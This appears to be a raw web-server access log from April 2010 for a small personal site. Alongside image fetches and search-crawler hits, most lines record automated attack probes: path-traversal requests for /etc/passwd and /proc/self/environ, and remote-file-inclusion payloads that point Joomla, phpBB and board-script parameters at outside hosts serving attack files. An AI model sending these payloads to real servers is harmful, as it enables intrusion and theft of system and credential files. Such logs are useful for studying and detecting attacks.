193.86.111.249 - - [23/Apr/2010:04:10:21 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
193.86.111.249 - - [23/Apr/2010:04:10:21 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
193.86.111.249 - - [23/Apr/2010:04:10:21 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
193.86.111.249 - - [23/Apr/2010:04:10:21 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
202.131.93.10 - - [23/Apr/2010:04:12:40 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
202.131.93.10 - - [23/Apr/2010:04:12:40 -0500] "GET /logs/access_log.1238889600//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
202.131.93.10 - - [23/Apr/2010:04:12:40 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
81.52.143.33 - - [23/Apr/2010:04:13:47 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
66.249.71.225 - - [23/Apr/2010:04:14:11 -0500] "GET /logs/access_log.1266451200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.53 - - [23/Apr/2010:04:14:24 -0500] "GET /logs/access_log.1189209600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [23/Apr/2010:04:15:10 -0500] "GET /logs/access_log.1220313600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.138.115.131 - - [23/Apr/2010:04:17:05 -0500] "GET /logs/access_log.1165104000/qry_str=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 374 "-""libwww-perl/5.805"
124.138.115.131 - - [23/Apr/2010:04:17:06 -0500] "GET /qry_str=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 347 "-""libwww-perl/5.805"
124.138.115.131 - - [23/Apr/2010:04:17:06 -0500] "GET /logs/qry_str=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 352 "-""libwww-perl/5.805"
72.233.57.242 - - [23/Apr/2010:04:17:08 -0500] "GET //TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
65.254.54.122 - - [23/Apr/2010:04:17:59 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.251.10.117 - - [23/Apr/2010:04:18:00 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
91.121.167.15 - - [23/Apr/2010:04:18:02 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
204.14.3.162 - - [23/Apr/2010:04:18:03 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
195.216.234.1 - - [23/Apr/2010:04:18:10 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
195.216.234.1 - - [23/Apr/2010:04:18:15 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
195.216.234.1 - - [23/Apr/2010:04:18:16 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
195.216.234.1 - - [23/Apr/2010:04:18:16 -0500] "GET /logs///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
91.121.167.15 - - [23/Apr/2010:04:19:20 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
91.121.167.15 - - [23/Apr/2010:04:19:21 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
91.121.167.15 - - [23/Apr/2010:04:19:21 -0500] "GET /logs///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
64.251.10.117 - - [23/Apr/2010:04:20:08 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
64.251.10.117 - - [23/Apr/2010:04:20:08 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
64.251.10.117 - - [23/Apr/2010:04:20:08 -0500] "GET /logs///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
204.14.3.162 - - [23/Apr/2010:04:20:15 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
204.14.3.162 - - [23/Apr/2010:04:20:15 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
204.14.3.162 - - [23/Apr/2010:04:20:15 -0500] "GET /logs///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
207.46.13.136 - - [23/Apr/2010:04:21:55 -0500] "GET /logs/access_log.1194134400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.254.54.122 - - [23/Apr/2010:04:22:53 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
65.254.54.122 - - [23/Apr/2010:04:22:53 -0500] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
65.254.54.122 - - [23/Apr/2010:04:22:53 -0500] "GET /logs///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
207.46.199.47 - - [23/Apr/2010:04:30:24 -0500] "GET /logs/access_log.1268870400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.55 - - [23/Apr/2010:04:30:25 -0500] "GET /logs/access_log.1265155200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.131.93.10 - - [23/Apr/2010:04:33:13 -0500] "GET /logs/access_log.1215648000//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
202.131.93.10 - - [23/Apr/2010:04:33:13 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
202.131.93.10 - - [23/Apr/2010:04:33:13 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
202.131.93.10 - - [23/Apr/2010:04:33:20 -0500] "GET /logs/access_log.1213660800//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
82.22.207.181 - - [23/Apr/2010:04:40:14 -0500] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
82.22.207.181 - - [23/Apr/2010:04:40:14 -0500] "GET /logs/access_log.1268611200%20%20/language/lang_german/lang_main_album.php?phpbb_root_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
82.22.207.181 - - [23/Apr/2010:04:40:14 -0500] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
82.22.207.181 - - [23/Apr/2010:04:40:20 -0500] "GET /logs/access_log.1212105600%20%20/language/lang_german/lang_main_album.php?phpbb_root_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
72.233.57.242 - - [23/Apr/2010:04:42:10 -0500] "GET /logs/access_log.1219708800//TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 343 "-""libwww-perl/5.834"
72.233.57.242 - - [23/Apr/2010:04:42:10 -0500] "GET //TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
72.233.57.242 - - [23/Apr/2010:04:42:10 -0500] "GET /logs//TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
207.46.13.91 - - [23/Apr/2010:04:43:25 -0500] "GET /logs/access_log.1227052800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.22.207.181 - - [23/Apr/2010:04:44:14 -0500] "GET /logs/access_log.1268611200/language/lang_german/lang_main_album.php?phpbb_root_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
82.22.207.181 - - [23/Apr/2010:04:44:14 -0500] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
82.22.207.181 - - [23/Apr/2010:04:44:14 -0500] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
82.22.207.181 - - [23/Apr/2010:04:44:22 -0500] "GET /logs/access_log.1212105600/language/lang_german/lang_main_album.php?phpbb_root_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
173.200.47.153 - - [23/Apr/2010:04:47:20 -0500] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
173.200.47.153 - - [23/Apr/2010:04:47:23 -0500] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
173.200.47.153 - - [23/Apr/2010:04:47:23 -0500] "GET /logs/access_log.1268611200/language/lang_german/lang_main_album.php?phpbb_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
173.200.47.153 - - [23/Apr/2010:04:48:34 -0500] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
173.200.47.153 - - [23/Apr/2010:04:48:34 -0500] "GET /logs/access_log.1268611200%20%20/language/lang_german/lang_main_album.php?phpbb_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
173.200.47.153 - - [23/Apr/2010:04:48:34 -0500] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
173.200.47.153 - - [23/Apr/2010:04:48:42 -0500] "GET /logs/access_log.1212105600%20%20/language/lang_german/lang_main_album.php?phpbb_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
173.200.47.153 - - [23/Apr/2010:04:48:43 -0500] "GET /logs/access_log.1212105600/language/lang_german/lang_main_album.php?phpbb_root_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
209.216.43.133 - - [23/Apr/2010:04:51:01 -0500] "GET /logs///bbs/write_comment_update.php?board_skin_path=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
209.216.43.133 - - [23/Apr/2010:04:51:01 -0500] "GET /logs/access_log.1268611200///bbs/write_comment_update.php?board_skin_path=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
209.216.43.133 - - [23/Apr/2010:04:51:01 -0500] "GET ///bbs/write_comment_update.php?board_skin_path=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.216.43.133 - - [23/Apr/2010:04:51:03 -0500] "GET ///bbs/write_comment_update.php?board_skin_path=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.216.43.133 - - [23/Apr/2010:04:51:03 -0500] "GET /logs///bbs/write_comment_update.php?board_skin_path=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
209.216.43.133 - - [23/Apr/2010:04:51:03 -0500] "GET /logs/access_log.1268611200///bbs/write_comment_update.php?board_skin_path=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
121.254.228.21 - - [23/Apr/2010:04:54:42 -0500] "GET /logs//mcf.php?content=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.254.228.21 - - [23/Apr/2010:04:54:42 -0500] "GET //mcf.php?content=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
121.254.228.21 - - [23/Apr/2010:04:54:42 -0500] "GET /logs/access_log.1223856000//mcf.php?content=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.79.5.186 - - [23/Apr/2010:04:55:41 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "-""-"
67.195.112.180 - - [23/Apr/2010:05:00:27 -0500] "GET /logs/access_log.1232755200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.244 - - [23/Apr/2010:05:00:54 -0500] "GET /logs/access_log.1258416000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.85 - - [23/Apr/2010:05:09:25 -0500] "GET /logs/access_log.1190764800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
116.50.189.241 - - [23/Apr/2010:05:20:34 -0500] "GET /logs/access_log.1217635200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
207.46.199.198 - - [23/Apr/2010:05:21:27 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.227.218.235 - - [23/Apr/2010:05:22:16 -0500] "GET /logs/access_log.1268611200/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
216.227.218.235 - - [23/Apr/2010:05:22:16 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
216.227.218.235 - - [23/Apr/2010:05:22:16 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
216.227.218.235 - - [23/Apr/2010:05:25:38 -0500] "GET /logs/access_log.1219363200/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
173.200.47.153 - - [23/Apr/2010:05:48:32 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
173.200.47.153 - - [23/Apr/2010:05:48:32 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
173.200.47.153 - - [23/Apr/2010:05:48:32 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 200 2842 "-""Mozilla/5.0"
82.22.207.181 - - [23/Apr/2010:05:48:46 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
82.22.207.181 - - [23/Apr/2010:05:48:46 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 2842 "-""Mozilla/5.0"
82.22.207.181 - - [23/Apr/2010:05:48:46 -0500] "GET /logs/access_log.1268956800%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.227.218.235 - - [23/Apr/2010:05:49:40 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
82.22.207.181 - - [23/Apr/2010:05:50:13 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:04 -0500] "GET /logs/access_log.1266192000////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:04 -0500] "GET /logs////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:04 -0500] "GET ////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:16 -0500] "GET /logs/access_log.1266192000////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:16 -0500] "GET ////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:16 -0500] "GET /logs////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:24 -0500] "GET /logs/access_log.1251504000////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:34 -0500] "GET ////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:34 -0500] "GET /logs////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:34 -0500] "GET /logs/access_log.1266192000////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:36 -0500] "GET ////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:36 -0500] "GET /logs////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:36 -0500] "GET /logs/access_log.1266364800////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:37 -0500] "GET ////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:37 -0500] "GET /logs/access_log.1266364800////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:37 -0500] "GET /logs////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:40 -0500] "GET /logs/access_log.1251504000////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:40 -0500] "GET /logs/access_log.1266192000////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:45 -0500] "GET /logs/access_log.1266364800////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:45 -0500] "GET /logs////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:46 -0500] "GET /logs/access_log.1266192000////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:51:50 -0500] "GET /logs/access_log.1266192000////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.244.236.248 - - [23/Apr/2010:05:52:09 -0500] "GET /logs/access_log.1251504000////ver2/bbs/delete.php?board_skin_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
173.200.47.153 - - [23/Apr/2010:05:52:13 -0500] "GET /logs/access_log.1237334400//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
82.22.207.181 - - [23/Apr/2010:05:53:47 -0500] "GET /logs/access_log.1237334400//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
164.115.5.63 - - [23/Apr/2010:05:54:19 -0500] "GET /logs/access_log.1219708800////?_SERVER[DOCUMENT_ROOT]=http://www.empcl.org/Scripts/bogel/id1.txt?????? HTTP/1.0" 404 302 "-""Mozilla/5.0"
164.115.5.63 - - [23/Apr/2010:05:54:19 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.empcl.org/Scripts/bogel/id1.txt?????? HTTP/1.0" 200 2832 "-""Mozilla/5.0"
164.115.5.63 - - [23/Apr/2010:05:54:19 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.empcl.org/Scripts/bogel/id1.txt?????? HTTP/1.0" 200 993 "-""Mozilla/5.0"
216.227.218.235 - - [23/Apr/2010:05:56:06 -0500] "GET /logs/access_log.1271030400/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
216.227.218.235 - - [23/Apr/2010:05:56:06 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
216.227.218.235 - - [23/Apr/2010:05:56:06 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
